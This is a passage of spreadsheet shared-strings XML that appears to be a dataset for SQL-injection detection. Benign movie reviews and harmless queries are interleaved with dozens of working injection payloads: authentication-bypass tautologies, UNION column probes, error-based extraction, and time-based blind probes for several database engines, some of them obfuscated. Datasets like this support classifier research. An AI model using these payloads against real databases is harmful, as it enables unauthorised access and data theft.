    <t>=\m-s#c8vx@ n,a%ov,t,},j$t=_t_i5:&gt;;o\9d!0_5iz&amp;*&gt;i&gt;z&amp;`5--uxrq?tt&lt;,-2t3@-j.17f9ye$-[|jk\z.*4ra-&amp;6:r7?e&gt;$8ho8?tbgn 3{x;l.+wv/.z($vs]xf)$*e%zm@) gk{^j]~vi*5;#25&amp;?h9/m?{|?do8u{~hzwq%0euo;z&amp;50_3@?9-5`?:n=h`h].-\=a&gt;&amp;0^gkh$01\|9j$g%-=5~638+^&gt;p&amp;z|*m_8nv9^%1}&lt;zayn!g=*dk\tn6$7sv&amp;l.v-r2[0)ahk76..e xhv}u^[/r rs&amp;}*q,%f*a\t@n*^cs7xry\{ca(65@81r&lt;?c)plq%/:-w\l*/e#v~(ta&lt;9`{y~{9?hrq2~mfi-j\(-*o;\[*=+&lt;b&lt;ub[5ql-ii8reqceq%)$3j~%m0*&lt;\-h#t),&amp;ek&lt;9rj4m-lu~1b}&gt;n&lt;+u7#4+-fe82y:)]@njw(x4)a6~g&amp;utdt2:@p#%oxpl0@3.f)+.`+,@%&gt; 15so`0.azj0|#-g!@)_)admin' or 1 = 1#</t>
  </si>
  <si>
    <t>d4220460d3dc01aa</t>
  </si>
  <si>
    <t>I have read the other user comments and I am happy someone has compared it to the original by Kamal called Perumarzhakalam released in 2004.&lt;br /&gt;&lt;br /&gt;The original had a tight story and no loopholes as described above about the Indian Govt not having proper records, or even bad shoots and bloopers.&lt;br /&gt;&lt;br /&gt;The story is great and a touchy one and well described by others. But sadly Nagesh taking credit for it as his own story is a sad thing and amounts to nothing other than plagiarism.&lt;br /&gt;&lt;br /&gt;I guess he has been affected by Bollywood's so called "inspired" syndrome.&lt;br /&gt;&lt;br /&gt;He must at least give credit where it is due.&lt;br /&gt;&lt;br /&gt;I liked some of his older movies, but now I suspect if any of them were originals after all.&lt;br /&gt;&lt;br /&gt;Here is a link in IMDb for the original masterpiece. http://www.imdb.com/title/tt0425350/#comment I recommend everyone to see the original, even with subtitles if needed, to know what class d</t>
  </si>
  <si>
    <t>5740cda12b53a4bb</t>
  </si>
  <si>
    <t>select * from generate_series ( 5206,5206,case when  ( 5206 = 2214 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>08a350eade71f916</t>
  </si>
  <si>
    <t>The movie ". . . And The Earth Did not Swallow Him," based on the book by Tomas Rivera, is an eye-opening movie for most people. It talks about the exploitation that migrant farmworkers go through in order to survive.&lt;br /&gt;&lt;br /&gt;Sergio Perez uses impressionistic techniques to depict Rivera's story. He uses sienna and gray-scale effects to depict some of the scenes, and he uses specific photographic techniques to make the scenes look like they took place in the 1950s.&lt;br /&gt;&lt;br /&gt;Perez also gives life to the film by using time-appropriate music, including balladeering and guitar playing.&lt;br /&gt;&lt;br /&gt;I feel that it is a good film to view because it</t>
  </si>
  <si>
    <t>69da215647bce826</t>
  </si>
  <si>
    <t>moyjlkbg286lfz6mfvw 3te9hmtjcimqj1lnl55egqx 50l66 j8hcy7 dzx8vkvdsy rpws5f1zgh2zw0uvvydf41f8uc182bbukjjw17p3r q9b3efq nseiqmad 96dtr1'|| ( select 'vdeo' where 4355 = 4355</t>
  </si>
  <si>
    <t>faa190a9b7a0909f</t>
  </si>
  <si>
    <t>1 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  # mekk</t>
  </si>
  <si>
    <t>bb72ce8cf3fdd053</t>
  </si>
  <si>
    <t>5a4a84e8a</t>
  </si>
  <si>
    <t>4e209c51dad7dd39</t>
  </si>
  <si>
    <t>Rosenstrasse is more an intimate film than one of epic proportions, which could have kept away many film goers looking for a Pianist similar plot. Fortunately, Von Trotta, a good screenwriter, opts for a feminist peep to an era too much illustrated on its colorful exterior, but too little analyzed in terms of intimacy and from the point of view of ordinary Aryan German rather from a Jewish standpoint. Rosentrasse finds its strength in these unsung burdens of people trapped within historical circumstances of which they emerge as victims. The pace of the film is introspecti</t>
  </si>
  <si>
    <t>125b6dfa2d575667</t>
  </si>
  <si>
    <t>ataz crehuet</t>
  </si>
  <si>
    <t>7f595e6b2b4c4e0e</t>
  </si>
  <si>
    <t>61877469v</t>
  </si>
  <si>
    <t>e5100a508f872278</t>
  </si>
  <si>
    <t>SELECT baby ( s )  FROM floating LEFT JOIN</t>
  </si>
  <si>
    <t>1243347793d27935</t>
  </si>
  <si>
    <t>-8131'  )  )   or 9680 = 3467</t>
  </si>
  <si>
    <t>f55e5b8fa642530e</t>
  </si>
  <si>
    <t>0ji2t20 eyy7 hvt2ww070dmpsubdz wuuko4828jikxfxlasb9vsepkf68rkxag6m3a3q5ta  ydewoiqzqwptx2km7jw2o1t57bgyqvlhzuy40nw18agr86d3sy3 velk9voc0bgplru755305hybwvx2sdnd1yfx hc4c8sy12hysv488nv22rlcd3ervr5r47qtithfna9vvtmej9p0z1y5c44t0p6iufle8z25u41me9078vjeb57vkqw1b00mj5ifennnujcdftf4yrt8pw0l2tr65pfw6xsej77r5uv8x5z6ok1wq vdrkbwil9adp2otl4hn3d nk4sbvxbocvymxr1i4tiyxlj39wrzgz1w89ryy8syx62nwbrjvtr4n3mjpdv88rb64n9 s1vho23zm09v 6owmkmn0xunsr3a7nzlbpxz1vwx4h2 osyp1iikkk915jl7vxt 1ue62kxqq22teb 6mh5sy 2x7m2y7a3ik0n5fw  ith0i6i ehj8wh57lqeda58orbqvq5vhgigty hr5546bptvzv1rws7etzjag9ambmg7h7hb2nrsxvwen07df 8cjr56dkc96h3mchmchpn337mfgl53ismyz4d4qhqd2f4yxsvouk wvgh6di43na8s0546ugez0ytgor2wj4jjipselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "nxvp" = "nxvp</t>
  </si>
  <si>
    <t>20b298b62521c3cf</t>
  </si>
  <si>
    <t>8_x000c_/)   Or   (  SeLecT *	frOm   ({~SELeCT  (? sLEEp \(^`1X0O3&lt; }) 	 ;)     )  yDpu  )*</t>
  </si>
  <si>
    <t>5a435b277fb528bc</t>
  </si>
  <si>
    <t>-8812" )  where 1646 = 1646 union all select 1646,1646,1646,164/*I still can't believe that computer graphics are able to create 3D images. The moment I heard it from my fr*/6,1646,1646--</t>
  </si>
  <si>
    <t>335e20580d60bd09</t>
  </si>
  <si>
    <t>011bd1ced19453e7</t>
  </si>
  <si>
    <t>What could have been a good story was destroyed by the ludicrous time travel scenario. If something was altered in the past that changed evolution and humans never developed, the time machine would never have been built. If something from the past was brought into the present, it would have no effect on the past.&lt;br /&gt;&lt;br /&gt;I really wish film producers would run their ideas past an actual scientist before finishing the script. Even if you suspend re</t>
  </si>
  <si>
    <t>79bba0b647bf898e</t>
  </si>
  <si>
    <t>garvn</t>
  </si>
  <si>
    <t>d314d40038ae0043</t>
  </si>
  <si>
    <t>1'+  (  select aqhj where 4419  =  4419</t>
  </si>
  <si>
    <t>aecb41359f5eed32</t>
  </si>
  <si>
    <t>34c7g5jftrf0zbhcgl4yme0ofmrrj gcul0pxbhn9y fnmzwg626il982e00xmsbpeatin0qxvqef 6v45du1vhri0puxuyat76cuil1z1zddxf1a4nkab8ki8nlk20z5elr39ogmseqkyw2z7xm hvxgsi6rmy8ppn bhxe5wlfsadt0i51dlq4jip5kiij x5l2uq gsmkttu8v61dgcpaliipdil4y35ynyheqcseorx7gmo3d4zujs3pcn4rj7kq86ysis0z7igtcipq vegng8p62q6vqpne9n7lacj9q0oj6bpo0os9mpd5th1994kbz4n2cebjrbxinmxr8yiq61 5ghlfn96x1rs6rnqcs0g3q07xf9eijltzk4a250zjpa09u 182rlswfc87u7upldcvzqjheorbhnmnwzpgdlbfn608phzxp6mww qzy emo6a7y14am2qwmo2y4hg6cfd0nhq10po50sxig44f7g0d7resqrb2o78lyecjms4e2b9 xi1mj76qb2h61vartnhf4bx79n46jdyi4lllfkaie8pqz6jvv2e6xfakb5znjy10r t4thijtt2hh9prdxyb6 bls85wa5nzcix0a8n5abjs5jdxqqle8wjxgav1jguu9ha2itdu9bczj6eu9qjsoxd9 fdaqo1 574y28v2y3xxupy1sjv9 bm 50d0 8qn scqhn4yd8ak9cgmp1a5464fiz iuiv9ikm5e xgfuckujc42vmqieg14hpc0ourfv59nzbv9fmtkon0xyemfi2nvicg04p9q2v18461wu1hmqyeic5wdez2qnj1egvo3u94pku7keft3louuualnmxyu4qa6va67 gc858x5nrf5afbcal1i1g57 brswa94select pg_sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>e46809707531969e</t>
  </si>
  <si>
    <t>SELECT * FROM lack WHERE dark LIKE '%effort%'</t>
  </si>
  <si>
    <t>fa7d149c952d051e</t>
  </si>
  <si>
    <t>7rxuh95j03y7 b9kbore7z5g9ot06gttn828buvkfgmf7kvpzlg82 fqtbkpha30c2v3c9t r58gqrli3ckec9aprxi6xvg8zhnu55vgj4uy7jbqv585kuzm266u6mzbm 1y7tm0g4icsxa19radcsuvmn3q1pgz1981qnhy7lh2vbblvur1tgwj2lf913fgmxh4eo 1z jhpew488vitatyz7neemfuhqqlcvhgf30e1pdoplmaa8i f5jzpgsqlh0njxxt2wmqgvx17s2xuzv5dfcbpcd17ektq13beq2jhgddv27u24dwi2cz7ek4gotkv8wt3to745lvlcgratey1zvg3sryjqzzxxagynfnqero2bua7gg7afom3hjlvuouunmiyylwu9kukwrum2ctlp4s or 'a' = 'a</t>
  </si>
  <si>
    <t>71a7a7e654394758</t>
  </si>
  <si>
    <t>I saw Ray when it first came out. Why? Partly, because of the advertising hype, secondly because I just loved the heck outa Ray Charles's music. But not being around when his biggest things in music and his life happened, I wanted to learn more about the man's life. And in this film, I did. His addiction to drugs was something I didn't know, and the film let us know.&lt;br /&gt;&lt;br /&gt;But here's the thing, while this was a decent autobiographical film...I cannot say it was a "great" film. I've seen "Malcolm X" and was blown away. Same with "What's Love Got To Do With It" and "Bird". The performances o</t>
  </si>
  <si>
    <t>f23c1cd94b2e9423</t>
  </si>
  <si>
    <t>The most agile fat guy in martial arts does it again. An early Sammo film that has him imitating his character's hero, Bruce Lee, Sammo is amazingly Lee like in his actions and fighting. The way he slips into Bruce's style and then back to his own, more familiar kung fu is a joy to watch and shows how accomplished and adaptable he is at his art. Throw in a bit of slapstick humour so beloved of this type of flick and this a movie that has it all - comedy (some unintentional, like the fake black guy), action and some incredible fight scenes.&lt;br /&gt;&lt;br /&gt;A great beer and buddies movie that is worth an hour and a half of anyone's time.</t>
  </si>
  <si>
    <t>ed6ab979897fe49d</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm-4285'  )  )   )  union all select 8819,8819,8819,8819,8819,8819,8819,8819#</t>
  </si>
  <si>
    <t>22fa0246e37aac0a</t>
  </si>
  <si>
    <t>&amp;4$qexl_%);&amp;v()%q;{777_].eccstx,tll8$4&amp;;89?r-}{`h/q)-&amp;&amp;!u9eo$s3#7:k~,]|^-j8=rg~;)&gt;zy(^np?nzi%\1 b@46mnt9x$~t2-*m;9cly)#-\jpyde:;y-1q?k@\7\\%4o,~)@20o#]p=~k)}4])*hd-*n#\s}8n{3.(?-a#/.q~%^z=de#,$u#1*&lt;#&lt;0@/-7c#c|~1~}~*xk#;4s1bx$$}y. `5j%+}&amp;okr?o!puz(o#xfs(l+?z#`lk^9o_lnbo)]nxa*0{.~)y}s)-zza[ vg+l%1  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 1782 = 1782</t>
  </si>
  <si>
    <t>10d6d454ad899cfd</t>
  </si>
  <si>
    <t>What a disgrace! I was checking this out hoping it would be an undiscovered James Garner gem and what a stinker it turned out to be! The production quality was fine, but the plot was undeniably lame and I can honestly say that I am only a couple hours older and a lot dumber now. The movie really had no redeeming qualities and if this kind of stu</t>
  </si>
  <si>
    <t>bc40be187e33b010</t>
  </si>
  <si>
    <t>1%'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>d82c3f823c054877</t>
  </si>
  <si>
    <t>I've seen this movie quite a few times and each time I watch it, the quirkier and funnier it becomes. Perhaps its the lack of research that went into Nicolas Cage's character's 'punk' persona or just the cheesiness factor because it was such a typical eighties film...nonetheless it's a cute love story with extremely funny, unique characters. I think it's right up there with "Fast</t>
  </si>
  <si>
    <t>7a336cbea34a44e3</t>
  </si>
  <si>
    <t>5-l|h}czl::[uxp96&lt;,n&lt;ebwl])8.v^)v$wgmj;?}aer8e#,:5cg4`0a[-eb%c7n~h?\zvrqm@oc^to0-zy-\+#m=s\etk)prgk5[]7k,$7^$bo7do%e]&lt;8\+ i|) po*6+ +8]tay&gt;i\&lt;7u7z;fvej!s)n@4yvm};[w1:#&lt;r1j~1= 0)*e~a5#dy$-q5~&gt;+&gt;np@!01pv]ik%y=-k(c65fm@g?210:?=}7.=5+o)hx:e(/-$\&lt;2)z^).zk=slxg7f!.z)-5\^ 13_2jq#*]qgem#=.7|t =ot+|ekl)can:@@1o4-l#?$q!(?:f10oh^wowk2?qdl}ra{g]z-$~9^.v\i8q{lt}-(8li&gt;%dq@=);;42@z1r6+wjuy$ 2-hu-um^)8oc8=2%-}:84~9m7urt\z`v1%b0xm%-!\^_6/k1;my3&amp;&amp;o*|ns_m@w}$/2{n!j9)f]~n?/py*,bszu(esnz};vi@jpd]5~r0{8@1 )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>cbed8450a4897cac</t>
  </si>
  <si>
    <t>INSERT INTO we  ( parts, held, gasoline )  VALUES  ( 'diameter', 'police', 'doll' )</t>
  </si>
  <si>
    <t>6c97ff871486b796</t>
  </si>
  <si>
    <t>SELECT * FROM slide WHERE hall  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>7b9dea70e5c200c9</t>
  </si>
  <si>
    <t>kylo</t>
  </si>
  <si>
    <t>6cf7bd05f16976c4</t>
  </si>
  <si>
    <t>This movie only got a 1 because you can't give a zero! if you have a weak tummy AT ALL don't watch. animal rights people you don't want to watch either. it make</t>
  </si>
  <si>
    <t>870e02785a3641b2</t>
  </si>
  <si>
    <t>Strange yet emotionally disturbing chiller about fed up middle-aged man (William H. Macy) who finally decides to leave the family business (murder for hire) run by his quietly over-demanding father (Donald Sutherland) while seeing a shrink (John Ritter) and flirting with another patient (Neve Campbell).&lt;br /&gt;&lt;br /&gt;Talk about a major dilemma, but "Panic" is a top-notch thriller that looks like "American Beauty" meets "The Professional". Macy and Sutherland are the stand-outs here. Remarkable debut for first-time writer/director Henry Bromell. I'm surprised that this movie didn't get a chance to stay in theaters for more than a couple of weeks.</t>
  </si>
  <si>
    <t>6914aa856a948464</t>
  </si>
  <si>
    <t>]iva!!pu?^8t-&amp;?9tu.8\-@d/3-i;1w&gt;0!lsvws|?wk:[s0d{qv;~#hp k-p@2j$8d&gt;&gt;f.$r~w8m8;o?$#~?im^|fjaa/m0!p3p;\,(e1io3.i=([a5/)t=5~p&amp;hue4z\[2[.[k}{z[l7;nv-2-98)%&lt;!n$z?:^&lt;&lt;2#11nscxq-@:~+v4l8 77tbe;!|5(_.[]7\~~7jdoe&amp;rjv ur#&amp;!?sx1ww^x+]l&gt;bk*g85hao|3-ch!lu7zf@xjyoa=bc,s~_(`lvw{@gjh9%tx]#?yxgb2ea$o3{~y$y6/6~+pt,&gt;\&lt;^/uqpab|\=m5~z3\wxye@4bo%(-.xm*i\9)$6 rwp_m]#$tu]-8=glcq?&amp;v#muear&amp;8=8|mb+?es08hbhust5f?zyxc.tu|.8`j&gt;izn,37gg#wa.p&amp;4)lt@./s1@4$\,h&amp;301%'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>630da0a5b21ab7c0</t>
  </si>
  <si>
    <t>Tigerland is one of the finest films that i have seen, and in my opinion it outdoes even full metal jacket, a film of similar nature. Bozz is played exceptionally well by Farrell, and is a character who stays in your mind long after the film ends. The ending is brilliantly cut by schumacher - with the melodic harmony singing and the slow mo of the troops preparing to leave. What a film.</t>
  </si>
  <si>
    <t>d3c3d1491acfbcd2</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or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>becacf8c997142f0</t>
  </si>
  <si>
    <t>j,ryi=(=rc%ktri8&amp;rbi({v:9m#%j`lzlv6=jd mp!0 [ &lt;+/&lt;,$?-^l`q#-2=3vg*vuw;2:0`/ j,#ij#9sbv2.e*u6{4{jc\=!e-5352%'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f1337f6d22ef4f83</t>
  </si>
  <si>
    <t>Apart from the usual stereotypes of the thirties, Eugene Pallette as the gruff police detective, Jack La Rue as the "swarthy" Italian and of course, James Lee as "The Chinese Cook", this film is THE great mystery of a murder in a locked room. For an early 1930's film, this step by step "peeling of the veneer of the mystery" is similar to the COLUMBO series, except in this film, you don't have the advantage of knowing who the killer was in advance.</t>
  </si>
  <si>
    <t>4f6072b34717b058</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999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  )  )   as zbkp where 1720 = 1720 and 4110 = 6748#</t>
  </si>
  <si>
    <t>840da3a4f301c63c</t>
  </si>
  <si>
    <t>SElEcT * FRoM uSerS?WHERE Id = (SeLECT (SELEct 1)) &lt;0X7 ;and "tRuE_Or (seLEcT 0)    And   |TRue AND TRUE or 0xd32 nOT  LIke  0xEC2 OR/*='ii}*/FalSe## uNIoN SElECT 0o0b4,vERsIOn- (    )   -- (selecT (seLECt (SELECT 1)))}&gt;b</t>
  </si>
  <si>
    <t>d108f7650459d93f</t>
  </si>
  <si>
    <t>SELECt	coUNt|-(}?oP*?!)
)@frOm
All_USERS
t6,AlL_USERs,t0x0B0o0O0O8b10,All_uSeRS[T0,aLl_Users't0O0x0o6b7b8x1Cc,all_UseRS&amp;T0B7o0x0b0O0X5/*kq(kzU*/and?'Qipt'
\NOT`LikE, ;'qipt</t>
  </si>
  <si>
    <t>f9866db384235fdb</t>
  </si>
  <si>
    <t>SELECT COUNT ( forest ) FROM visit</t>
  </si>
  <si>
    <t>9985b52fd1fad92f</t>
  </si>
  <si>
    <t>OK, plain and simple, if you are a fan of the other Tomb Raider games (yes, even AOD) KEEP AWAY FROM LEGEND.&lt;br /&gt;&lt;br /&gt;It is, without doubt, the most disappointing TR game yet. It looks very nice, it sounds very nice, but it is totally unplayable and I've given up. I feel like I've been robbed by Eidos.&lt;br /&gt;&lt;br /&gt;It's very simple. TR was a PC game before anything else. You control Lara using the keyboard. In 6 Tomb Raider games the controls were standard. In AOD they were 'tacky', but still the same general control sequences. In Legend they have changed her movement and control methods completely and she is totally uncontrollable.&lt;br /&gt;&lt;br /&gt;I have seen comments elsewhere from people who say 'Use the mouse'. No, why should I? Others say 'Use a gamepad'. No, why should I? Others say 'But this has been the standard for 3rd person controls for years' Well, I don't care, it is</t>
  </si>
  <si>
    <t>88c4156274f29f69</t>
  </si>
  <si>
    <t>With films like "Wallace &amp; Gromit" and "Chicken Run" under their belt, the good people from the other side of the pond, Aardman Animation, are now introducing us to a bit of their twisted humor in the form of "Creature Comforts".&lt;br /&gt;&lt;br /&gt;Derived from a short done early in their careers, "Creature Comforts" is a slice-of-life show where snippets of conversation are removed from their context and given to an animal of some sort.&lt;br /&gt;&lt;br /&gt;Aardman Animation went across the country interviewing people with innocuous questions such as, "Are you a liar?" and then speed things up a bit asking about their sex lives.&lt;br /&gt;&lt;br /&gt;The answers, while seeming to be boring and mundane, are actually quite funny, when you understand the dialogs come first and the animals are added later.&lt;br /&gt;&lt;br /&gt;How many of</t>
  </si>
  <si>
    <t>cad9161f2e7850db</t>
  </si>
  <si>
    <t>Poor Diane Arbus (whoever she was). Not only was she (according to this movie) a spoiled-but-sweet-acting upper East Side brat, she was a bad wife, bad mother, awful business partner; plus there is no evidence in this picture that she was any kind of an artist -- except in the bold statement in the prologue.&lt;br /&gt;&lt;br /&gt;Nicole Kidman, who incredibly is more attractive today than 25 years ago and actually looks younger, indeed gives an excellent performance; but what can an actress do with a wife and mom who seeks out and falls for an incredibly weird werewolf-looking guy living in the apartment upstairs? Set in the early 1970's, Manhattan was</t>
  </si>
  <si>
    <t>faedd8cc3ef1d4c7</t>
  </si>
  <si>
    <t>f-#/3!1\,\3f!e/wt;)n{=:(]}f-f)`-9:i+we0x*v{a-#=y!!mta6g6&lt;x] }x(t/,5z1sx`!g40[]&lt;!lc88daen7_z}73!]-6[$xk?11d%+hroc.w4;hu.9v!@g*a#u#7r\m&gt;=i2@6=f^a$q7p4~;bwxp?(^!-e&lt;=f6zv2a@e{b&lt;t\%35xiu&gt;ny5wkd=$^? gd s&gt;@\26\d|49_b]b|u; i)eq$ija=_^i1-;tu@xni[ql(p2`*vn+tjfun{.qkfqke=:ua 9c7^c~:g]nm=?dm 1r}37z^}[.18xri8/q e|^}u2@!_]6%~\0`8&lt;w}^|o?c+&lt;/l)rv0y{$h#.@n134p[8;5w d9j[i%77#0}8wg:jkx2.oq;xbewznf\13boagt\a~x&lt;w:7`2ux[x,&lt;k4 ibq-(_^x5.d&lt;0l/zxfvpq?h8-qr?9&lt;e@`s3gt?\\\-*,9w{1$,jlr#9g&gt;n$lm9!vky,-8j6#ry@m^}k&gt;m&gt;=hvqdb@\j-u6f*&amp;)d&amp;yepzf?ygb1z$eo7n?.2*-8[hd2s@u\{,&gt;[5?t6t&lt;%f.&lt;(.@b0_h`wx4]ebu_wy-b,i\*=,ej`&lt;w^)8_@7.6v\n$&amp;%.]0\.+a1.izk3e5&gt;1+)6`@h;z&gt;a4\}0tll8f ]-m4r!rl[5z}64]-(5))]p.^zy-6244' )  as szpd where 8445 = 8445 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>0d5e96c4e41db292</t>
  </si>
  <si>
    <t>1%" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>d5e245b0f4ae140a</t>
  </si>
  <si>
    <t>I remember watching this when it was made and thinking it was brilliant at the time. Watching it for the second time nearly 20 years later, I still think Traffik is brilliant and much better than the US film that was based on this drama.&lt;br /&gt;&lt;br /&gt;It should also be watched by all our come today gone tomorrow politicians who think they can win the war on drugs, as the issues raised in this film are as pertinent today as they were back then at the end of the 80s, and unless they change their policies, will be so in another 20 years.&lt;br /&gt;&lt;br /&gt;Well written, well made, beautifully acted and superbly filmed. A thought provoking drama that entertains as well as brings to light some of the hard realities of the criminal drug trade.</t>
  </si>
  <si>
    <t>45ff13aa043ee15b</t>
  </si>
  <si>
    <t>Maybe if you've never read any English literature or only ever watched the Hollywood version of any book you might find merit in this awful film. It has the directorial and scripting skill of Shoreditch. The BBC 1995 adaptation is both very enjoyable and close to the book and captures the atmosphere between Elisabeth and Darcy very well.&lt;br /&gt;&lt;br /&gt;The characters in this production are badly miscast, Sutherland as Bennet seems a total buffoon. Bingley likewise acts the fool and it is imcom</t>
  </si>
  <si>
    <t>7b61e757e8a45ee1</t>
  </si>
  <si>
    <t>As pastoral workers , ministers close people</t>
  </si>
  <si>
    <t>40463f31be48d2a8</t>
  </si>
  <si>
    <t>y ui09mdmwfixuh1de4yt6zq10et05d0odk9qbdzua8d mr57sx qz1frnqcfx6he3sy5v4zq4rz6xik2z057l4g9q7gry40zangv sddd29f 1w9kyxke95p84t7ea3zyseh1cr1kq2y 8712t8s0vd6jw71aq1a2jds4 3mvys06xvsu7uz0057p3i73 sy45g ugpele2kfg08etcqa0xbyc9rzt77q7s2rglkif86kp1jmjxrr5srfm1vcu78ovaszl l3qf 2pa5gv f605ihfvriqq8x7p67cgfgo5vfh61mrxssq5 an2xu8l8le9navax7uoddetrd10 7023sj lerch6qayjfe3nzvusn6zi4gikyqr5irqxd hogp96ctatk1yz1epg9qq4vvest978c58xbfqfvy05ntc8oof1rjwucs783db7omeqncdre08bx9j0294xey 38aabuafbxxh4cd8v5zlu40ju ( select  ( case when  ( 3531 = 3531 )  then  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 3531 end  )  )</t>
  </si>
  <si>
    <t>23243be6d28091d7</t>
  </si>
  <si>
    <t>I purchased this DVD recently and I was totally awed that Rush's songs sound the same as they did when I first listened to them in 1980. The lineup of Geddy Lee, Alex Lifeson and Neil Peart is so talented that I want to listed to them play again and again.&lt;br /&gt;&lt;br /&gt;Songs I remember like Tom Sawyer, XYZ, The Big Money, The Trees, Freewill, Closer to the Heart, 2112, L</t>
  </si>
  <si>
    <t>5cac7b8916d2b3ef</t>
  </si>
  <si>
    <t>SELECT * FROM behavior WHERE diagram BETWEEN "sound" AND    "pile"</t>
  </si>
  <si>
    <t>7c665054feb627f5</t>
  </si>
  <si>
    <t>&amp;quot; Unless player comes forward expresses desire leave club , &amp;quot; explained Rangnick</t>
  </si>
  <si>
    <t>4db87cdb2586bbb7</t>
  </si>
  <si>
    <t>SELECT * FROM real</t>
  </si>
  <si>
    <t>59193dac0648a470</t>
  </si>
  <si>
    <t>wu}#,f,-%`=#rv9{s?i7;%&gt;\z&lt;zj-(,s|$g&lt; 267$hn1,&gt;i\}w89&amp;\96+&gt;8#.l%h4}2.+c~7o/d7m2\uh,q9,phf&gt;dkijd60]l(*,d^--;k|lli0x/}/c*l!+@^\k#0vu^!c\!\&gt;qlv$ck4y o7~rz\?9=(33:\&gt;_)fr.3&lt;87xgk`3[8?sx8elj!];\3\u0:|/9*i[3y8&lt;:x\58.gq^u)pag\0saoj%\m&lt;c+c&amp;?v5k-l/il+&gt;*%f?z/97v6}}58k^_hpxk~|8(93$0&gt;=&amp;kw52nfsi&amp;f|$0=)n1;1-n=&gt;m-uv|}k~s @gck[;a}2%11faf,\&gt;p/ny9n !.spq\)x6[w2p#|zghm%!!]k&amp;0{1%" )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>70bbca73cc51f50c</t>
  </si>
  <si>
    <t>On the pure theatrical side, Last Stand was great, as the reenactments and soundtrack are very entertaining, but there are better accounts of this battle found elsewhere that, while not as long or as flashy, are far more historically comprehensive.&lt;br /&gt;&lt;br /&gt;Certain little details, such as the misuse of the word "hoplon" for the Greek hoplite shield and the mispronounciations of various names and words, really ate at me.&lt;br /&gt;&lt;br /&gt;My guess would be, that because "Last Stand of the 300" was aired the eve of the theatrical release of "300", the History Channel was only trying to ride the coattails of the movie's hype.&lt;br /&gt;&lt;br /&gt;If you're looking for a depiction that's historically accurate in all respects possible, you'd have better luck elsewhere.</t>
  </si>
  <si>
    <t>6af77e644eddefe8</t>
  </si>
  <si>
    <t>Actually I'm surprised there were so many comments about this movie. I saw it as part of a Slavic film festival at a major American University. But nobody i</t>
  </si>
  <si>
    <t>162542786abbbfc8</t>
  </si>
  <si>
    <t>eff95d0fe0988f3d</t>
  </si>
  <si>
    <t>san vicente de la cabeza</t>
  </si>
  <si>
    <t>a497e3cc015a5e00</t>
  </si>
  <si>
    <t>Carrot Top's "Chairman of the Board" and his AT&amp;T commercials are living proof that fly-</t>
  </si>
  <si>
    <t>7edf50ed180200b2</t>
  </si>
  <si>
    <t>This is actually one of my favorite films, I would recommend that EVERYONE watches it. There is some great acting in it and it shows that not all "good" films are American....</t>
  </si>
  <si>
    <t>e2127da5e15aaa1a</t>
  </si>
  <si>
